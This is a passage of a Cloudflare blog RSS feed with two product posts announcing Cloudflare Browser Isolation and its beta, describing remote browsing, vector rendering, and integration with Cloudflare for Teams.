      <a href="#remote-browsers-must-be-fast">
        
      </a>
    </div>
    <p>Legacy browser isolation solutions are hamstrung by their fundamental technology or the network they operate on. These old solutions rely on high-latency and bandwidth-heavy pixel pushing, or fragile content-disarm and reconstruction techniques that degrade performance, break websites, and might miss a malicious payload in the process.</p><p>Network Vector Rendering allows us to deliver a safe view of a remote webpage without high bandwidth usage or degraded image quality, but it is one part of the solution. By leveraging our global network we position remote browsers close to everyone connected to the Internet. This allows us to deliver a responsive, low latency stream of the webpage regardless of where you are physically located.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/14hVfWbzFCUuQBFVWj4obN/800fc77266678170d7746dfe8f17d75f/image1-35.png" />
            
            </figure><p>Running a web browser on powerful servers connected to the backbone of the Internet introduces a powerful performance benefit. By sending minimal draw commands over the last mile wire, users with low bandwidth Internet connections enjoy a faster more responsive Internet.</p><p>Combine a massive, smart, distributed network with our patented super fast, lightweight Network Vector Rendering technology, and the result is remote browsing technology liberated from legacy constraints — providing crisp isolated pages to any user, on any device, anywhere in the world.</p><p>One of the advantages of using Browser Isolation is it reduces the local web browser’s burden downloading modern web pages. According to the FCC nearly 30 million Americans do not have access to broadband Internet (<a href="https://www.fcc.gov/about-fcc/fcc-initiatives/bridging-digital-divide-all-americans">source</a>). Modern websites are not optimised for low bandwidth connections typically requiring the download of hundreds of objects. Cloudflare’s remote browsers are connected to the backbone of the Internet and able to consistently download websites at broadband speeds, leveling the field for users on low-bandwidth Internet connections.</p><p>Here’s an example of a web page loading on a slow Internet connection compared with and without Browser Isolation. We are excited to see Browser Isolation bridging the digital divide and making the Internet faster for under-served Internet users.</p><div></div>
<p><i>Note: Timing is measured from the start of web page download until the webpage has triggered it’s on-load signal.</i></p>
    <div>
      <h3>Remote Browsers Must Be Easy to Use</h3>
      <a href="#remote-browsers-must-be-easy-to-use">
        
      </a>
    </div>
    <p>Browser Isolation products are typically <a href="https://www.cloudflare.com/learning/access-management/how-to-implement-zero-trust/">implemented</a> either as add-on network appliances (such as a virtual machine or firewall box) or by changing the user’s preferred browser. As an add-on network appliance, IT teams need to piece together multiple disparate solutions (even when offered by the same vendor). This leads to unnecessary complexity within the network and disparate interfaces for controlling policy configurations and monitoring threats.</p><p>Cloudflare Browser Isolation integrates natively into Cloudflare for Teams, delivering a consolidated view of all network and isolated traffic. Just like how you can use Gateway to allow / block traffic based on content categories, or security threats you can also define Isolation policies to dynamically isolate websites based on identity, security threats or content.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/40YG6LOKdW7W9xsVZoTr5o/ff92964ea1f5e15f88fb6487cc1afc95/image2-29.png" />
            
            </figure>
    <div>
      <h3>The Future of Internet Browsing is Remote Browsing</h3>
      <a href="#the-future-of-internet-browsing-is-remote-browsing">
        
      </a>
    </div>
    <p>Local webpage execution poses a huge threat to businesses and organizations around the world. The solution is simple: shift the burden of executing untrusted code from the user’s device to a remote isolated browser.</p><p>Secure, fast, simple Remote Browser Isolation is now possible. Today we’re excited to announce that Cloudflare Browser Isolation is available as an add-on for Cloudflare for Teams. You can now protect your business from browser-based security threats without changing your web browsers or networks. To get started, <a href="https://www.cloudflare.com/teams/browser-isolation/">sign up for a Cloudflare for Teams account</a>, and add on Browser Isolation to the Teams Gateway or Teams standard plans. Contract customers can have Browser Isolation added to their Cloudflare for Teams plan by <a href="http://cloudflare.com/teams/plans/enterprise">requesting access at this form</a>.</p><p>From the day Cloudflare started, our mission has been to help build a better Internet and democratise the technologies that were only previously accessible to the large companies with sophisticated networks, dedicated IT teams and the budgets to support them.</p><p>Like a not-too-distant past when HTTPS encryption was reserved for “sensitive” login pages and <a href="https://www.cloudflare.com/ecommerce/">eCommerce</a> checkouts, we believe that trusting arbitrary website code will seem just as archaic creating the new paradigm of Zero Trust web browsing. The time for reliable and responsive Remote Browser Isolation technology is NOW.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Remote Browser Isolation]]></category>
            <guid isPermaLink="false">49yiFglS3Ah2UXGFbVOV23</guid>
            <dc:creator>Tim Obezuk</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing Cloudflare Browser Isolation beta]]></title>
            <link>https://blog.cloudflare.com/browser-beta/</link>
            <pubDate>Thu, 15 Oct 2020 15:00:00 GMT</pubDate>
            <description><![CDATA[ Today, we’re excited to open up a beta of a third approach to keeping web browsing safe with Cloudflare Browser Isolation. ]]></description>
            <content:encoded><![CDATA[ <p></p>
    <div>
      <h3>Reimagining the Browser</h3>
      <a href="#reimagining-the-browser">
        
      </a>
    </div>
    <p>A web browser, the same application that connects users to the entire Internet, also connects you to all of the potentially harmful parts of the Internet. It’s an open door to nearly every connected system on the planet, which is powerful and terrifying.</p><p>We also rely on browsers more than ever. Most applications that we use live in a browser and that will continue to increase. For more and more organizations, a corporate laptop is just a managed web browser machine.</p><p>To keep those devices safe, and the data they hold or access, enterprises have started to deploy “<a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">browser isolation</a>” services where the browser itself doesn’t run on the machine. Instead, the browser runs on a virtual machine in a cloud provider somewhere. By running away from the device, threats from the browser stay on that virtual machine somewhere in the cloud.</p><p>However, most isolation solutions take one of two approaches that both ruin the convenience and flexibility of a web browser:</p><ul><li><p>Record the isolated browser and send a live stream of it to the user, which is slow and makes it difficult to do basic things like input text to a form.</p></li><li><p>Unpack the webpage, inspect it, repack it and send it to the user - sometimes missing threats or more often failing to repack the webpage in a way that it still works.</p></li></ul><p>Today, we’re excited to open up a beta of a third approach to keeping web browsing safe with Cloudflare Browser Isolation. Browser sessions run in sandboxed environments in Cloudflare data centers in 200 cities around the world, bringing the remote browser milliseconds away from the user so it feels like local web browsing.</p><p>Instead of streaming pixels to the user, Cloudflare Browser Isolation sends the final output of a browser’s web page rendering. The approach means that the only thing ever sent to the device is a package of draw commands to render the webpage, which also makes Cloudflare Browser Isolation compatible with any HTML5 compliant browser.</p><p>The result is a browser that just feels like a browser, while keeping threats far away from the device.</p><div></div>
<p></p><p>We’re inviting users to sign up for the beta today as part of Zero Trust week at Cloudflare. If you’re interested in signing up now, visit the bottom of this post. If you’d like to find out how this works, keep reading.</p>
    <div>
      <h3>The unexpected universal productivity application</h3>
      <a href="#the-unexpected-universal-productivity-application">
        
      </a>
    </div>
    <p>While it never quite became the replacement operating system Marc Andreessen <a href="https://www.wired.com/2012/04/ff-andreessen/">predicted in 1995</a>, the web browser is perhaps the most important application today on end-user devices. In the workplace, many people spend the majority of their at-work computer time entirely within a web browser connected to internal apps and external SaaS applications and services. As this has occurred, browsers have needed to become increasingly complex — to address the expanding richness of the web and the demands of modern web applications such as Office 365 and Google Workspace.</p><p>However, despite the pivotal and ubiquitous role of web browsers, they are the least controlled application in the enterprise. Businesses struggle to control how users interact with web browsers. It’s all too easy for a user to inadvertently download an infected file, install a malicious extension, upload sensitive company data or click a malicious zero-day link in an <a href="https://www.cloudflare.com/learning/email-security/what-is-email-fraud/">email</a> or on a webpage.</p><p>Making the problem worse is the growing prevalence of BYOD. It makes it difficult to enforce which browsers are used or if they are properly patched. Mobile device management (MDM) is a step in the right direction, but just like the slow patching cycles of on-premise firewalls, MDM can often be too slow to protect against zero day threats. I’ve been the recipient of many mass emails from CISO’s reminding everyone to patch their browser and to do it right now because this time it’s “<b><i>really important</i></b>” (CVE-2019-5786).</p>
    <div>
      <h3>Reimagining the browser</h3>
      <a href="#reimagining-the-browser">
        
      </a>
    </div>
    <p>Earlier this week we announced Cloudflare One, which is our vision for the future of the corporate network. The fundamental approach we’ve taken is a blank sheet: to zero out all the assumptions of the old model (like castle-and-moat) and usher in a new model based on the complex nature of today’s corporate networking and the shift to <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a>, cloud-based <a href="https://www.cloudflare.com/learning/network-layer/network-as-a-service-naas/">networking-as-a-service</a>.</p><p>It would be impossible to do this without thinking about the browser. Remote computing technologies have offered the promise of fixing the problems of the browser for some time — a future where anyone can benefit from the security and scale of cloud computing on their personal device. The reality has been that getting a generally performant solution is much more difficult than it sounds. It requires sending a user’s input over the Internet, computing that input, retrieving resources off the web, and then streaming them back to the user. And it all must occur in milliseconds, to create an illusion of using a local piece of software.</p><p>The general experience has been terrible, and many <a href="https://www.cloudflare.com/learning/access-management/how-to-implement-zero-trust/">implementations</a> have created nothing but angry emails and help-desk tickets for IT folks.</p><p>It is a tough problem, and it’s something we’ve been hard at work at solving. By delivering a vector-based stream that scales across any display size without requiring high bandwidth connections we’re able to reproduce the native browser experience remotely. Users experience the website as it was intended, without all the compatibility issues introduced by scrubbing HTML, CSS and JavaScript. And performance issues are aided tremendously by the fact that the managed browser is hosted only milliseconds away on our network.</p>
    <div>
      <h3>How secure remote browsing fits in with Cloudflare for Teams</h3>
      <a href="#how-secure-remote-browsing-fits-in-with-cloudflare-for-teams">
        
      </a>
    </div>
    <p>Before Cloudflare Browser Isolation, Cloudflare for Teams consisted of two core services:</p><p><a href="http://cloudflare.com/teams/access"><b>Cloudflare Access</b></a> creates a Zero Trust network <a href="https://www.cloudflare.com/learning/access-management/what-is-the-network-perimeter/">perimeter</a> that allows users to access corporate applications without needing to poke holes in their internal network with a legacy VPN appliance.</p><p><a href="http://cloudflare.com/teams/gateway"><b>Cloudflare Gateway</b></a> creates a <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway</a> that protects users from threats on any website.</p><p>These tools are excellent for protecting private Internet properties from unauthorized access and web browsing activity from known malicious websites. But what about unknown and unforeseeable threats?</p><p><a href="http://cloudflare.com/teams/browser-isolation"><b>Cloudflare Browser Isolation</b></a> answers this question by sandboxing a web browser in a remote container that is easily disposed of at the end of the user’s browsing session or when compromised.</p><p>Should an unknown threat such as a zero day vulnerability or malicious website exploit any of the hundreds of Web APIs, the attack is limited to a browser running in a supervised cloud environment leaving the end-user’s device unaffected.</p>
    <div>
      <h3>The Network is the Computer®</h3>
      <a href="#the-network-is-the-computer-r">
        
      </a>
    </div>
    <p>Web browsers are the foundation that the shift to the cloud has been built on. It’s just that they’ve always run in the wrong place.</p><p>In the same way that it made no sense for a developer to run and maintain the hardware that their application runs on, the same exact case can be made for the other side of the cloud’s equation: the browser. Funnily enough, the solution is exactly the same: like the developer’s application, the browser needed to move to the cloud. However, as with all disruptions, it takes time and investment for the performance of the new technology to catch up to the old one. When AWS was first launched in 2006, the inherent limitations meant that for most developers, it made sense to continue to run on-premise solutions.</p><p>At some point though, the technology improves to the point where the disruption can start taking over from the previous paradigm.</p><p>The limiting factor until today for a cloud-based browser has often been the experience of using it. A user’s experience is limited by the speed of light; it limits the time it takes a user’s input to travel to the remote data center and be returned to their display. In a perfect world, this needs to occur within milliseconds to deliver a real time experience.</p><p>Cloudflare has one very big advantage in solving that problem.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5sENUbqoMLc6sU8SHkz5Ol/96345f7f149c25cb909762c4fdf5e045/image2-17.png" />
            
            </figure><p>To deliver real-time remote computing experiences, each of our 200+ data centers are capable of serving remote browsing sessions within the blink of an eye of nearly everyone connected to the Internet. This allows us to deliver a low latency, responsive stream of a webpage regardless of where you’re physically located.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>But that’s enough talking about it. We’d love for you to try it! Please complete the form <a href="http://cloudflare.com/teams/lp/browser-isolation">here</a> to sign up to be one of the first users of this new technology in our network. We’ll be in touch as we expand the beta to more users.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Zero Trust Week]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Remote Browser Isolation]]></category>
            <guid isPermaLink="false">2SkxJrMgredeCB5VQ29Rrg</guid>
            <dc:creator>Tim Obezuk</dc:creator>
        </item>
    </channel>
</rss>